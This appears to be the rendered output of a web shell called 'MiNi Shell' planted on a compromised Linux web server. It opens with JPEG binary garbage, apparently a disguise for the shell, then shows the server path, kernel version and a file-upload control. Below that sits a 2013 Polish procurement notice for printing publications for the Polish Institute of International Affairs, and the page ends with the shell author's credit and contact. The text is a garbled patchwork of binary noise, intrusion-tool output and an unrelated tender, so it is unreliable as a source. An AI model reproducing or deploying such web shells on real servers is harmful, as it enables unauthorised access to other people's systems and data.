JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131209/508740-N-2013.html

<p class="kh_header"><b>Warszawa: Usługi drukowania i dostawy publikacji do Polskiego Instytutu Spraw Międzynarodowych w Warszawie w okresie 2014-2016 r.</b><br>
<b>Numer ogłoszenia: 508740 - 2013; data zamieszczenia: 09.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polski Instytut Spraw Międzynarodowych , ul. Warecka 1a, 00-950 Warszawa, woj. mazowieckie, tel. 22 5568000, faks 22 5568099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pism.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi drukowania i dostawy publikacji do Polskiego Instytutu Spraw Międzynarodowych w Warszawie w okresie 2014-2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> FORMAT 1: SERIA WYDAWNICZA

1.	Nakład: 200-250 egz. każdego tomu, od 1 do 2 tomów rocznie;
2.	Format bloku papieru: 150x235 mm;
3.	Średnia objętość jednego tomu: 900 stron;
4.	Papier offsetowy 80 g/m2,
a)	druk: 1 kolor (czarny);
5.	Oklejka: plastykowana skóra CAPYS 6340 (producent: Balacron) z tłoczonymi literami w kolorze złotym;
6.	Oprawa: twarda, szyta nimi, grzbiet półokrągły (format wyjściowy: 155x242 mm);
7.	Obwoluta: papier kredowany 200 g/m2, 
a)	druk obwoluty: 1 kolor (kolor zbliżony do oklejki - bordowy) + folia błyszcząca;
8.	Wyklejka: biała;
9.	Zakładka papierowa: 13x60 mm, papier kredowany 200 g/m2, kolor: 1+1 (kolor oklejki) + folia błyszcząca, umieszczona na taśmie w kolorze białym, wszyta w grzbiet o łącznej długości 250 mm (według wzoru).

FORMAT 2: CZASOPISMA (2 kwartalniki). FORMAT B5

1.	Nakład: 200-800 egz.;
2.	Objętość: do 10 arkuszy drukarskich (160 strony);
3.	Papier offsetowy 80 g/m2,
a)	druk: 1 kolor (czarny) + ok. 6 stron w kolorze (CMYK) na wybranych stronach;
4.	Okładka: karton 250 g/m2, 
a)	druk okładki: CMYK lub 2+1 kolor (Pantone, czarny) + folia matowa;
5.	Oprawa: miękka, klejona na gorąco.

FORMAT 3: KSIĄŻKI. FORMAT B5

1.	Nakład: 300-1000 egzemplarzy;
2.	Objętość: 200-500 stron;
3.	Papier offsetowy 80 g/m2,
a)	druk: 1 kolor (czarny);
4.	Okładka: karton 250 g/m2,
a)	druk okładki: 4+1+folia matowa + lakier wybiórczy; 
5.	Oprawa: miękka, klejona na gorąco.

FORMAT 4: KSIĄŻKI. FORMAT B5

1.	Nakład: 300-1000 egzemplarzy;
2.	Objętość: 200-500 stron;
3.	Format bloku papieru: pomniejszony B5, 
4.	Papier offsetowy 80 g/m2, 
a)	druk: 1 kolor (czarny);
5.	Oklejka: papier kredowany 135-150 g/m2,
a)	druk oklejki: 4 kolory (CMYK) + folia matowa + lakier wybiórczy;
6.	Wyklejka: 1 kolor.
7.	Oprawa: twarda, szyta nimi, grzbiet półokrągły (format wyjściowy: 155x242 mm).


FORMAT 5: KSIĄŻKI. FORMAT A5

1.	Nakład: 300-1000 egz.;
2.	Objętość: 200-500 stron; 
3.	Blok papieru: pomniejszony A5;
4.	Papier ecru 70 g/m2, 
a)	druk: 1 kolor (czarny);
5.	Oklejka: okleina ozdobna (np. skóropodobna lub papierowa imitująca płótno) z tłoczeniem na pierwszej i czwartej stronie oraz grzbiecie;
6.	Wyklejki: papier w kolorze ecru.
7.	Oprawa: twarda, szyta nićmi, grzbiet półokrągły (format wyjściowy 148x210 mm).


FORMAT 6: KSIĄŻKI. FORMAT A5

1.	Nakład: 300-1000 egz.;
2.	Objętość: 200-500 stron;
3.	Papier offsetowy 80 g/m2, 
a)	druk: 1 kolor;
4.	Okładka: karton 250 g/m2, 
a)	druk okładki: 4 kolory (CMYK) + folia matowa + lakier wybiórczy;
5.	Oprawa: miękka, klejona na gorąco.

FORMAT 7: RAPORTY A4

1.	Nakład: 100-400 egzemplarzy;
2.	Objętość: 50-100 stron;
3.	Papier offsetowy 80 g/m2, 
a)	druk: 1 kolor (czarny);
4.	Okładka: karton 250 g/m2, 
a)	druk okładki: 4+1+folia błyszcząca; 
5.	Oprawa: zeszytowa (dwie zszywki).

FORMAT 8: FOLDER 

1.	Format: 270x208 mm (poziom);
2.	Nakład: 500-2000 egz.;
3.	Objętość: 20 strony (wraz z okładką), 
4.	Papier kredowany błyszczący 200 g/m2;
a)	Druk na każdej stronie 4+1+1+folia+lakier wybiórczy, (pantone: metaliczne srebro, pantone: turkus);
5.	Okładka: kreda błyszcząca 300 g/m2, 
a)	druk okładki: 4+4+1+1+folia matowa+lakier wybiórczy, 
6.	Oprawa: zeszytowa 2 zszywki..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych powtórzenie zamówień tego samego rodzaju, co przedmiot prowadzonego postępowania.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia z art. 22 ust. 1 pkt 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy zobowiązani są w treści oferty przetargowej wykazać, iż w okresie ostatnich 3 lat przed upływem terminu do składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonywali, a w przypadku świadczeń okresowych lub ciągłych wykonują,  zamówienia o zakresie podobnym do przedmiotu zamówienia, o łącznej wartości brutto 100 000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia z art. 22 ust. 1 pkt 3 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia z art. 22 ust. 1 pkt 3 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia z art. 22 ust. 1 pkt 4 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oferta zawiera wypełniony -Formularz ofertowy, stanowiący  Załącznik nr 2 do SIWZ oraz niżej wymienione oświadczenia i dokumenty:
1)	pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wzór - Załącznik nr 6 do SIWZ). Pełnomocnik musi  być ustanowiony (w myśl art. 23 ust. 2 ustawy Pzp) do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku wyboru oferty najkorzystniejszej Konsorcjum, Zamawiający przed podpisaniem umowy w sprawie zamówienia publicznego, wymaga przedstawienia umowy  regulującej zasady współpracy, w tym między innymi określającej:
a)	dane Wykonawców,
b)	określenie celu gospodarczego,
c)	określenie wzajemnych ról w realizacji powierzonego zamówienia,
d)	określenie lidera, który pełnić będzie rolę pełnomocnika uprawnionego do wszystkich kontaktów w sprawie realizacji i  rozliczenia umowy,
e)	zasadę odpowiedzialności solidarnej Wykonawców, wchodzących w skład Konsorcjum w przypadku niewykonania lub nienależytego wykonania przedmiotu  umowy,
2)	pełnomocnictwo do podpisania oferty, w tym do podpisania wszystkich oświadczeń i dokumentów składanych wraz z ofertą, jeżeli podpisywać je będzie osoba nie upoważniona do reprezentacji na podstawie wpisu w odpowiednim rejestrze, 
3)	oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie ze wzorem stanowiącym Załącznik nr 3 lub Załącznik nr 3 a do SIWZ - Oświadczenie Wykonawcy.
4)	oświadczenie o braku podstaw do wykluczenia, zgodnie ze wzorem, stanowiącym Załącznik nr  4 lub Załącznik nr 4 a  do SIWZ - Oświadczenie Wykonawcy.
5)	  oświadczenie o przynależności lub nie do grupy kapitałowej, zgodnie ze wzorem, stanowiącym Załącznik nr 7 do SIWZ,   
6)	  zaakceptowany przez Wykonawcę projekt umowy, stanowiący Załącznik nr 8 do SIWZ.
7)	  zaakceptowany przez Wykonawcę projekt umowy wykonawczej, stanowiący Załącznik nr 9 do SIWZ.
8)	 pozostałe  dokumenty, wymienione w zapisie pkt VIII niniejszej SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień Umowy Ramowej oraz danej Umowy Cząstkowej w stosunku do treści oferty złożonej przez Wykonawcę w toku postępowania o udzielenie Zamówienia Cząstkowego możliwa jest tylko i wyłącznie na warunkach i w zakresie określonym poniżej: 
1)	w przypadku zaistnienia siły wyższej uniemożliwiającej wykonanie przedmiotu zamówienia cząstkowego w terminach wskazanych w Umowie Cząstkowej lub dołączonym do niej harmonogramie - dopuszcza się możliwość zmiany terminu realizacji przedmiotu umowy; na potrzeby Umowy Strony przyjmują, iż siłą wyższą jest zdarzenie zewnętrzne, którego nie można było przewidzieć, analizując i uwzględniając wszystkie okoliczności sprawy, jak również któremu nie można było zapobiec znanymi, normalnie stosowanymi sposobami;
2)	w przypadku zmiany obowiązującej stawki VAT - dopuszcza się możliwość odpowiedniej do zmiany przepisów podatkowych zmiany Umowy;
2.	Nie stanowią zmiany Umowy w rozumieniu art. 144 PZP w szczególności następujące przypadki: 
a)	zmiana osób upoważnionych do kontaktu w toku realizacji Umowy;
b)	zmiana danych teleadresowych Stron;
c)	zmiana danych rejestrowych Stron;
d)	zmiana sposobu prowadzenia korespondencji pomiędzy Stronami.
3.	Wszelkie zmiany Umowy Ramowej wymagają porozumienia Stron oraz zachowania formy pisemnej pod rygorem nieważności. 
4.	Zamawiający może rozwiązać z Wykonawcą umowę ramową w przypadku, gdy Wykonawca nie wykona lub nienależycie wykona co najmniej dwie Umowy cząstkowe lub dwukrotnie odmówi podpisania Umowy cząstkowej.
5.	Zamawiający ma prawo odstąpić od Umowy cząstkowej bez wyznaczania terminu dodatkowego w przypadku naruszenia postanowień tejże Umowy lub Umowy ramowej w szczególności, gdy Wykonawca bez uzasadnionych przyczyn nie wykona przedmiotu Umowy cząstkowej w wyznaczonym terminie, określonym w Umowie cząstkowej.
6.	W razie odstąpienia, o którym mowa w ust. 5, Zamawiający może wskazać, że Wykonawca ma obowiązek zakończenia realizacji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pism.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polski Instytut Spraw Międzynarodowych
ul. Warecka 1 a, 00-950 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 10:00, miejsce: Polski Instytut Spraw Międzynarodowych
ul. Warecka 1 a, 00-950 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com